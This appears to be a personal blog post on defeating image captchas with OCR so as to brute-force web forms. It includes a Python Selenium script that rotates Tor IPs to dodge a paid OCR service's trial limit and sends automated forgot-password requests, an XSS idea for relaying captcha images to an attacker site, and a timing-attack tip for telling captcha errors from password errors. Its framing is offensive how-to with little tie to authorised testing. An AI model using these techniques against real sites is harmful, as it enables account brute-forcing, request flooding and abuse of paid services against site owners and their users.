Bypassing Captcha
Is AI gonna change the future of hacking?
In the below image there is a form that everyone that uses web see almost everyday in login, register, upload, send data, etc…
Every pentester, bug bounty hunter that i know see that form, and what come in his mind? maybe sqli, maybe user enumiration, maybe default credentials, and so on and on.
But for me there is a vulnerability just by visually looking at the form. today’s AI can simply read text from image. well if simple AI today can read text from image, as an attacker we just create brute-force script that download the image translate the image to text and send it with the request. captcha is a security feature, that means that bypassing it most likly to be a vulnerability.
But is it that simple to do so? well yes, i already did it 😂, so lets move on and see how you can do it too 😊.
Bypassing the captcha
step 1
check if the AI can actualy read it and give it back to us as text.
yea we did it! the first step was a success. we upload the image to “image to text” converter and we got our image into text. that means that its possible to bypass this captcha.
step 2
after we know that its possible we need to automate the upload image to text and add it to the brute-force script.
step 3
after we have a script that brute-force and send it with the code converted from the image, we need to know how consistent the script is. well it may look pretty buy as humen AI make mistakes too. that mean that if the AI converted the image wrong 1 images out of 10 there is 1 to 10 possability thet the brute-force hit, but we missed it duo to wrong chaptcha code. so i recommand of checking for an error such as wrong captcha and if wrong captcha error has shown try to do the same request again.
other problems can be that its hard to automate sending the image to the AI duo to the time it takes to automate it or maybe the AI have rate limmit or its paid AI. in my expireance most likly if this is the case try to find another AI.
step 4
we seccessfuly bypass the captcha so so now we can do anything that we could do if the website had no captcha at all.
example of python script to bypass captcha and send a lot of forgot password requests:
import requests
import os
import string
from selenium import webdriver
from selenium.webdriver.common.by import By
from time import sleep
def get_captcha(url):
try:
# this command need sudo to switch tor ip
os.system("sudo killall -HUP tor")
# connect to tor proxy
# the api I use cost money after 5 tries, so I connect to tor to bypass the 5 times trial
PROXY = "socks://localhost:9050"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--proxy-server=%s' % PROXY)
# open chrome
chrome = webdriver.Chrome(chrome_options=chrome_options)
# you can set the path to /tmp/img.png
img_path = "/tmp/captcha.png"
# download captcha image
open(img_path, "wb").write(requests.get(url).content)
# convert the captcha image to text
chrome.get("https://brandfolder.com/workbench/extract-text-from-image")
sleep(15)
chrome.execute_script('window.document.getElementsByClassName("fsp-drop-pane__input")[0].id = "iamid";')
chrome.find_element_by_id("iamid").send_keys(img_path)
# if the internet or the computer slow change 40 to 60 or more
sleep(40)
captcha_code = chrome.find_element_by_id("extracted_text").text
# check if captcha is valid
if captcha_code.strip().__len__() == 6:
for i2 in captcha_code.strip():
if i2 not in string.digits:
e = 0
break
else:
e = 1
if e:
return captcha_code.strip()
chrome.close()
chrome.quit()
except:
pass
b = webdriver.Chrome()
b.get("https://vulnerable.website/forgotPassword#/")
sleep(2)
b.find_element(By.ID, "email").send_keys("my@email.com")
b.find_element(By.XPATH, "/html/body/div[1]/div/main/div[2]/div[4]/button").click()
f = get_captcha(b.find_element(By.ID, "captcha_image").get_attribute("src"))
Automate form sending is not the only think we can bypass
When people see chaptcha the first thing is there mind is this captcha is probebly to defende from attacks such as dos/ddos, brute-force, enumiration.
But some people also uses captcha to defend themselfs from attacks such as csrf or sending file using xss. because they say when an attacker achived xss he cant solve the captcha using javascript so he cant automate this form.
But this is not the case anymore, as we proved we can bypass the captcha, we can create a javascript code that send to the attacker website the image, the attacker website send him back the captcha code and the attacker execute the the form or the action with the captcha code.
So the capcha bypass is not only used to bypass the captcha for sending form he can be use in a very creative ways to bypass captcha for any captcha use.
the last part is a theory that i have, and its not something i have done but i am 100% sure that is possible to do.
also i belive that in the future AI will be able to bypass any captcha including g-captcha (google captcha).
problems that i handled with while doing it:
in some cases, the company understand that you can bypass the captcha and they simply dont care.
in some cases, the captcha is not readable by any AI that exists today.
in some cases, it may take 4 times or more for the ai to get the captcha right.
in some cases, the website send same error if captcha is wrong and if the password for example is wrong. as a result you cant know that the cpatcha read failed and you need to resend the same credentials with different captcha. in this case i recommand to use time attack. check what the response time for captcha fail and and what is the response time for password fail. its not 100% reliable but it might work.
in some cases, i bypassed the captcha but there is rate limit so bypassing captcha is not that usful.